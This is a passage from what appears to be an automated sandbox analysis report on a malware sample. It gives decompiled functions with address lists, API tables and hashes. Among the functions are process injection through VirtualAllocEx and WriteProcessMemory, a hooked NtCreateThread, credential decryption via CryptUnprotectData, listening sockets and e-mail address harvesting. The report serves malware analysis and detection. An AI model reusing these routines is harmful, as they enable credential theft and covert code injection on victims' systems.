										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E004181A0(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E004181A0(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E00418426(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x00418499
0x0041849c
0x004184a2
0x004184b9
0x004184be
0x004184c2
0x004184c6
0x004184c8
0x004184cb
0x004184cd
0x00418830
0x00418833
0x0041883a
0x0041883d
0x00000000
0x0041883f
0x004184d3
0x004184d6
0x004184d9
0x00000000
0x00000000
0x004184e1
0x004184e5
0x004184f9
0x004184f9
0x004184fb
0x004184fe
0x00418501
0x00418501
0x00418505
0x00418508
0x00000000
0x00000000
0x0041850e
0x00418512
0x00418515
0x00000000
0x00000000
0x0041851b
0x0041851f
0x00000000
0x00000000
0x00418525
0x00418529
0x00000000
0x00000000
0x0041852f
0x00418533
0x00000000
0x00000000
0x00418539
0x0041853d
0x00000000
0x00000000
0x00418543
0x00418547
0x00000000
0x00000000
0x0041854d
0x00418558
0x0041855b
0x0041855e
0x00418562
0x004187ba
0x004187be
0x004187c0
0x004187c3
0x004187c6
0x00000000
0x00000000
0x004187ce
0x004187d1
0x00000000
0x00000000
0x004187d3
0x00000000
0x004187d3
0x0041856b
0x00418570
0x00418575
0x00418577
0x00000000
0x00000000
0x0041857d
0x00418580
0x00418582
0x0041859b
0x0041859b
0x0041859f
0x004185a2
0x004185ba
0x004185ba
0x004185be
0x004185c1
0x004185d9
0x004185d9
0x004185dc
0x004186c0
0x004186c8
0x004186d0
0x004186da
0x004186e4
0x004186e7
0x004186eb
0x004186ee
0x004186f6
0x00418700
0x004186f0
0x004186f0
0x004186f0
0x00418703
0x00418707
0x0041870a
0x00418712
0x0041871c
0x0041870c
0x0041870c
0x0041870c
0x0041871f
0x00418723
0x00418726
0x0041872e
0x00418738
0x00418728
0x00418728
0x00418728
0x0041873b
0x0041873e
0x00418740
0x004187e1
0x004187e6
0x004187f0
0x004187f5
0x004187f8
0x004187fa
0x00418804
0x00418809
0x004187fc
0x004187fc
0x004187fc
0x00000000
0x00418746
0x00418746
0x00418748
0x004187b2
0x004187b7
0x004187b7
0x00000000
0x004187b7
0x0041875d
0x0041875f
0x00418762
0x00418764
0x0041880e
0x0041880f
0x00418817
0x00418822
0x00418827
0x0041882c
0x0041882c
0x0041882c
0x00000000
0x0041882c
0x0041876f
0x00418774
0x00418776
0x00000000
0x00000000
0x00418786
0x0041878b
0x0041878d
0x00000000
0x00000000
0x0041879e
0x004187a8
0x00000000
0x004187a8
0x00418740
0x004185e2
0x004185e7
0x00000000
0x00000000
0x004185fc
0x00418612
0x00418617
0x00418619
0x00000000
0x00000000
0x0041861f
0x00418625
0x00418625
0x00418627
0x0041862b
0x00418630
0x00418631
0x00418634
0x00418634
0x00418639
0x0041863f
0x00418642
0x0041865a
0x0041865d
0x00418660
0x00418666
0x00418668
0x00000000
0x00000000
0x00418680
0x00418686
0x00418688
0x0041868d
0x0041868d
0x00418693
0x00418699
0x0041869c
0x004186a2
0x004186ac
0x004186b0
0x00000000
0x00000000
0x004186b6
0x004186ba
0x00000000
0x00000000
0x004186ba
0x00000000
0x0041869c
0x004185c6
0x004185cc
0x004185d1
0x004185d3
0x00000000
0x00000000
0x00000000
0x004185d3
0x004185a7
0x004185ad
0x004185b2
0x004185b4
0x00000000
0x00000000
0x00000000
0x004185b4
0x0041858e
0x00418593
0x00418595
0x00000000
0x00000000
0x00000000
0x00418595
0x00000000
0x00418501
0x00000000

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83ebaf853cd632bad88ce22480bacf6fa7167e5aa7797a62c9378f9c7b44b24
Instruction ID: d450ce691fd4bd393835527052aa282fcca0e3b0a26223f57d92c37f7910a1f1
Opcode Fuzzy Hash: c83ebaf853cd632bad88ce22480bacf6fa7167e5aa7797a62c9378f9c7b44b24
Instruction Fuzzy Hash: 17B1A071900209AADB10EFA5CD41BFEB7B5BF04344F50451FF951A6691DB38E9C1CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041631A, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041631A(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xd8
				_t60 =  *_t1 + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00411A14(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E004119C1(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x00416323
0x00416325
0x00416328
0x0041632a
0x0041632f
0x00416332
0x0041633e
0x00416354
0x0041635a
0x0041635d
0x0041635f
0x00416415
0x00000000
0x00416415
0x0041636c
0x0041636e
0x00416370
0x00416372
0x004163fe
0x0041640b
0x00416411
0x00416411
0x00416411
0x00000000
0x00416411
0x00416378
0x0041637e
0x004163f2
0x004163f3
0x004163f8
0x004163fc
0x00000000
0x00000000
0x00000000
0x004163fc
0x00416380
0x00416386
0x00416388
0x00000000
0x00000000
0x0041638a
0x00416392
0x00416394
0x00416397
0x004163d7
0x004163d7
0x004163d9
0x00000000
0x00000000
0x0041639b
0x0041639e
0x004163a1
0x004163d2
0x004163d2
0x004163d5
0x004163d5
0x00000000
0x004163d5
0x004163a6
0x004163a6
0x004163a8
0x004163ab
0x00000000
0x00000000
0x00000000
0x00000000
0x004163ad
0x004163ad
0x004163b0
0x004163b5
0x004163b8
0x004163c0
0x004163c7
0x004163c7
0x004163c7
0x004163c7
0x004163ca
0x004163cd
0x004163cd
0x00000000
0x004163ad
0x004163e6
0x004163ec
0x004163ee
0x004163ee
0x004163ee
0x00000000
0x004163ee
0x00000000

APIs

IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 00416336
VirtualAllocEx.KERNEL32(7519F560,00000000,?,00003000,00000040), ref: 00416354
WriteProcessMemory.KERNEL32(7519F560,7519F560,00000000,00000000,00000000,00400000,?), ref: 004163E6
VirtualFreeEx.KERNEL32(7519F560,7519F560,00000000,00008000,00400000,?), ref: 0041640B

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: 5e6c3b48b5d67348c22735b3c0b2f8f972ddb06d6c8eab33d4fc929b6a2a6e6a
Instruction ID: 710d9f74d951ebba1a3cab7f1a33122397051ba771ad5de09541ef2fa0435076
Opcode Fuzzy Hash: 5e6c3b48b5d67348c22735b3c0b2f8f972ddb06d6c8eab33d4fc929b6a2a6e6a
Instruction Fuzzy Hash: 7E31A271A00219AFDF148F64CD44BEEBBB4EF00715F0680AAE955B72A0D774ED90CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414B03, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00414B0C
bind.WS2_32(00000000,?,-0000001D), ref: 00414B2C
listen.WS2_32(00000000,?), ref: 00414B3B
closesocket.WS2_32(00000000), ref: 00414B46

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 6db6cd27de217f03861f93276f0c8ad4b0c5e35f602957f980d779ad9cf61a1f
Instruction ID: 78f2fe533b86f967a410072e65bc68802fb6cb8c287bfcc7d5d1b5fea0278b90
Opcode Fuzzy Hash: 6db6cd27de217f03861f93276f0c8ad4b0c5e35f602957f980d779ad9cf61a1f
Instruction Fuzzy Hash: 8EF030322045117AD2201F39DD4DB6F79A9ABC1BB1B184729FA63E71E0E738C4C29524

Uniqueness

Uniqueness Score: -1.00%

Function 00408D01, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408D01(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				void _v28;
				long _v32;
				intOrPtr _v40;
				void* __edi;
				void* _t21;
				void* _t27;
				signed int _t30;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t42;

				_t42 = __esi;
				_t38 = __edx;
				_t35 = __ecx;
				_t21 = E00406473();
				_t40 = _a16;
				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00413036(_v28) == 0)) {
					_t34 = E00406296(_t35, _t38, _v28);
					_t51 = _t34;
					if(_t34 != 0) {
						_t27 = E00406388(_t35, _t40, _t42, _t51, _t34, 0);
						if(_t27 != 0) {
							_t30 = _t27 -  *0x422544 + E00406B06;
							if(( *0x422530 & 0x00000010) != 0) {
								_t30 = _t30 ^  *(_a24 + 0xb0);
							}
							 *(_a24 + 0xb0) = _t30;
						}
						CloseHandle(_t34);
					}
				}
				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
			}

0x00408d01
0x00408d01
0x00408d01
0x00408d0c
0x00408d11
0x00408d16
0x00408d55
0x00408d57
0x00408d59
0x00408d5e
0x00408d65
0x00408d6d
0x00408d79
0x00408d7e
0x00408d7e
0x00408d87
0x00408d87
0x00408d8e
0x00408d8e
0x00408d59
0x00408db5

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00408D27
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408D8E

Part of subcall function 00413036: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413043
Part of subcall function 00413036: Thread32First.KERNEL32 ref: 0041305E
Part of subcall function 00413036: CloseHandle.KERNEL32(00000000), ref: 0041307F

NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00408DAA

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
String ID:
API String ID: 3154080929-0
Opcode ID: 7346f47837ee331f23d2f9015ac24d4a5bb4d849009f63b46d19df3eee902c5c
Instruction ID: 612c50af3ce6f004ede2e1a3cac6c6892bedc1fb80a6524fc31818700b9bf026
Opcode Fuzzy Hash: 7346f47837ee331f23d2f9015ac24d4a5bb4d849009f63b46d19df3eee902c5c
Instruction Fuzzy Hash: 2011E431100309ABDB119F50CE44BAB3BAAFF48308F04463EBD84A51E1DB39D862D75D

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE1, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 00414DEA
bind.WS2_32(00000000,00000017,-0000001D), ref: 00414E0A
closesocket.WS2_32(00000000), ref: 00414E15

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
Instruction ID: 0753b2dff088035645d3236cc4b7d4d9188a0a293052d383e8411d291555f001
Opcode Fuzzy Hash: 44e594ebd3cfd45e0fa7b2e8d7497f330a8ee7e756eec3927565abca3bc1a630
Instruction Fuzzy Hash: 51E0803224061076D2201F3DED4EA7F25A9ABC5B717140715F572D71E1E77CC8C2D124

Uniqueness

Uniqueness Score: -1.00%

Function 0040D161, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040D161(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E0040D10E(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E0040D10E(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E0040D10E(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E0040D10E(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E0040D10E(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E00412510(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E00411991(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E004121FE(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E00411D7D(_v52);
										LocalFree(_v52);
									}
								}
								E004119C1(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E00419DD3(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E00419DD3(_t68, _t117);
					_t70 = 0x403490;
					_t109 =  ==  ? 0x403490 : _v16;
					_t97 =  ==  ? 0x403490 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00412742(_a12, E00412510( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E004119C1(_v16);
				}
				E00417F4F(E00417F4F(E00417F4F(E00417F4F(E00417F4F(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x0040d161
0x0040d16c
0x0040d16f
0x0040d172
0x0040d175
0x0040d17a
0x0040d17d
0x0040d181
0x0040d186
0x0040d189
0x0040d18d
0x0040d192
0x0040d195
0x0040d199
0x0040d19e
0x0040d1a1
0x0040d1af
0x0040d1b2
0x0040d1b9
0x0040d205
0x0040d208
0x0040d20f
0x0040d218
0x0040d21e
0x0040d224
0x0040d224
0x0040d225
0x0040d227
0x0040d22c
0x0040d22f
0x0040d234
0x0040d239
0x0040d247
0x0040d253
0x0040d258
0x0040d261
0x0040d271
0x0040d274
0x0040d274
0x0040d261
0x0040d27d
0x0040d27d
0x0040d239
0x0040d225
0x0040d28a
0x0040d28b
0x0040d292
0x0040d295
0x0040d296
0x0040d2a3
0x0040d2a8
0x0040d2ad
0x0040d2b0
0x0040d2b3
0x0040d2b5
0x0040d2b5
0x0040d2b7
0x0040d2bb
0x0040d2be
0x0040d2c0
0x0040d2d6
0x0040d2e1
0x0040d2e6
0x0040d30a
0x0040d315

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0040D258
LocalFree.KERNEL32(?,?,?,?), ref: 0040D274

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: 038ac8c91ef75bb887c89e9fc48457655e50370f6e4775b15238bbcb5ac21fcd
Instruction ID: c572493bc24f96b00d9033ba504302362ba6e5f516b7714f96296b14203f56cb
Opcode Fuzzy Hash: 038ac8c91ef75bb887c89e9fc48457655e50370f6e4775b15238bbcb5ac21fcd
Instruction Fuzzy Hash: 28518C71E00218AADF00ABF1DC55AEEBBB5AF04318F14447EF604F7291DA788985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041D883, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041D883(char* __esi) {
				void* _v40;
				short _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				void* _t13;
				int _t16;
				signed int _t20;
				short _t24;
				char* _t25;

				_t25 = __esi;
				E00411A74(_t13, __esi, 0, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t16 = GetVersionExW( &_v324);
				if(_t16 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0041D7AD();
					if(_v48 > 0xff || _v46 != 0) {
						_t20 = 0;
					} else {
						_t20 = _v48 & 0x000000ff;
					}
					 *(_t25 + 1) = _t20;
					asm("sbb eax, eax");
					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t24 = _v40;
					 *((short*)(_t25 + 4)) = _t24;
					return _t24;
				}
				return _t16;
			}

0x0041d883
0x0041d891
0x0041d89d
0x0041d8a7
0x0041d8af
0x0041d8b5
0x0041d8c0
0x0041d8cb
0x0041d8da
0x0041d8d4
0x0041d8d4
0x0041d8d4
0x0041d8dc
0x0041d8ea
0x0041d8f4
0x0041d8f8
0x0041d8fc
0x00000000
0x0041d8fc
0x0041d901

APIs

GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0041D8A7
GetNativeSystemInfo.KERNEL32(?), ref: 0041D8B5

Part of subcall function 0041D7AD: GetVersionExW.KERNEL32(?,75144EE0), ref: 0041D7CC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$InfoNativeSystem
String ID:
API String ID: 2518960133-0
Opcode ID: 99f17bb24ae70561eff93019c8d2e45b047bba9270af0922ef986b1ea0eb3715
Instruction ID: 2b97fee54c05e7aefd8bc8c177bade5dbb1d4a604df2c6912b1adcccf4186e47
Opcode Fuzzy Hash: 99f17bb24ae70561eff93019c8d2e45b047bba9270af0922ef986b1ea0eb3715
Instruction Fuzzy Hash: 0101A774D002498ADB30EBA5C8017DEB7F4AF08300F04806AD159E21D0E778DA84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D880, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040D880() {
				signed int _v5;
				void* _v12;
				signed short* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v56;
				void* _v260;
				char _v356;
				char _v460;
				void* __edi;
				void* __esi;
				char* _t52;
				void* _t53;
				void* _t55;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t84;
				intOrPtr* _t86;
				void* _t87;
				signed short* _t88;
				intOrPtr _t96;
				signed int _t113;
				intOrPtr* _t117;
				char* _t119;
				char* _t121;

				_t52 =  &_v32;
				_v32 = 0;
				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
				if(_t52 != 0) {
					L3:
					_v16 = 0;
					_t117 = 0;
					L4:
					if(_t117 == 0) {
						return _t52;
					}
					_t53 = 0x39;
					E00419DD3(_t53,  &_v56);
					_t121 =  &_v40;
					_t55 = 0x3a;
					E00419DD3(_t55, _t121);
					_push(_t121);
					_push( &_v56);
					_push(_t117);
					_v20 = 0;
					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
						L31:
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_push(0xcc);
						return E0040C9F4(_t114, _v20, 0x38);
					}
					_push( &_v12);
					_push(_t117);
					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
						goto L31;
					}
					_t65 = 0x3b;
					E00419DD3(_t65,  &_v356);
					_t67 = _v12;
					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
					_t69 = _v12;
					_push(_t69);
					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
						L30:
						_t71 = _v12;
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						goto L31;
					}
					_t96 = 0x64;
					do {
						_t73 = _v12;
						_t114 =  &_v28;
						_push( &_v28);
						_push(_t73);
						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
							goto L28;
						}
						_t77 = _v28;
						_t114 =  &_v24;
						_push( &_v24);
						_push(0x4015d0);
						_push(_t77);
						if( *((intOrPtr*)( *_t77))() != 0) {
							L27:
							_t79 = _v28;
							 *((intOrPtr*)( *_t79 + 8))(_t79);
							goto L28;
						}
						_v5 = 1;
						while(1) {
							_push(_v5 & 0x000000ff);
							_push( &_v356);
							_t114 = 0x34;
							_t119 =  &_v460;
							if(E004126B4( &_v356, _t114, _t119) <= 0) {
								break;
							}
							_t86 = _v24;
							_t114 = _t119;
							_v36 = _t96;
							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
							if(_t87 != 0) {
								if(_t87 == 0x7a || _t87 == 1) {
									L25:
									_v5 = _v5 + 1;
									if(_v5 <= _t96) {
										continue;
									}
								}
								break;
							}
							_t88 =  &_v260;
							if(_v260 == 0) {
								L18:
								if( *_t88 != 0x40) {
									_t88 = 0;
								}
								L20:
								if(_t88 != 0 && E00411DB5( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
									E00411DB5(1,  &_v20, 0x40348c);
								}
								goto L25;
							}
							_t113 = _v260 & 0x0000ffff;
							while(_t113 != 0x40) {
								_t88 =  &(_t88[1]);
								_t113 =  *_t88 & 0x0000ffff;
								if(_t113 != 0) {
									continue;
								}
								goto L18;
							}
							goto L20;
						}
						_t84 = _v24;
						 *((intOrPtr*)( *_t84 + 8))(_t84);
						goto L27;
						L28:
						_t75 = _v12;
						_push(_t75);
					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
					_t117 = _v16;
					goto L30;
				}
				_t117 = _v32;
				if(_t117 == 0) {
					goto L3;
				} else {
					_v16 = _t117;
					goto L4;
				}
			}

0x0040d88c
0x0040d8a2
0x0040d8a5
0x0040d8ad
0x0040d8bb
0x0040d8bb
0x0040d8be
0x0040d8c0
0x0040d8c2
0x0040da65
0x0040da65
0x0040d8cd
0x0040d8ce
0x0040d8d5
0x0040d8d8
0x0040d8d9
0x0040d8e2
0x0040d8e6
0x0040d8e7
0x0040d8e8
0x0040d8f0
0x0040da4b
0x0040da4e
0x0040da54
0x00000000
0x0040da5c
0x0040d8fb
0x0040d8fc
0x0040d902
0x00000000
0x00000000
0x0040d910
0x0040d911
0x0040d916
0x0040d91c
0x0040d91f
0x0040d924
0x0040d92a
0x0040da42
0x0040da42
0x0040da48
0x00000000
0x0040da48
0x0040d932
0x0040d933
0x0040d933
0x0040d938
0x0040d93b
0x0040d93c
0x0040d942
0x00000000
0x00000000
0x0040d948
0x0040d94d
0x0040d950
0x0040d951
0x0040d956
0x0040d95b
0x0040da25
0x0040da25
0x0040da2b
0x00000000
0x0040da2b
0x0040d961
0x0040d965
0x0040d969
0x0040d970
0x0040d973
0x0040d974
0x0040d983
0x00000000
0x00000000
0x0040d989
0x0040d99a
0x0040d99d
0x0040d9a3
0x0040d9a8
0x0040da09
0x0040da10
0x0040da10
0x0040da16
0x00000000
0x00000000
0x0040da16
0x00000000
0x0040da09
0x0040d9b2
0x0040d9b8
0x0040d9d2
0x0040d9d6
0x0040d9d8
0x0040d9d8
0x0040d9da
0x0040d9dc
0x0040d9ff
0x0040d9ff
0x00000000
0x0040d9dc
0x0040d9ba
0x0040d9c1
0x0040d9c7
0x0040d9ca
0x0040d9d0
0x00000000
0x00000000
0x00000000
0x0040d9d0
0x00000000
